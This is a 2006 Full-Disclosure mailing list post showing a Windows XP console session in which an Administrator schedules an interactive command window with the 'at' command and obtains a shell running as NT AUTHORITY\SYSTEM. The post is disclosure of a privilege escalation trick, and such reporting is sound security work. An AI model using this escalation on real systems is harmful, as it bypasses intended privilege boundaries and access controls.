[Full-disclosure] elevating privileges from Admin to SYSTEM

/dev/null exceed at email.si
Tue Mar 7 14:58:15 GMT 2006


Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>whoami
XP\Administrator

C:\>at 23:45 /interactive cmd
Added a new job with job ID = 1

[ @23:45 new cmd window pops-up ]

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

This works like a cham. Thanx Kokanin.
Must check a bit that service lauching thing Nick suggested...

-E.


____________________
http://www.email.si/




Full-Disclosure is hosted and sponsored by Secunia.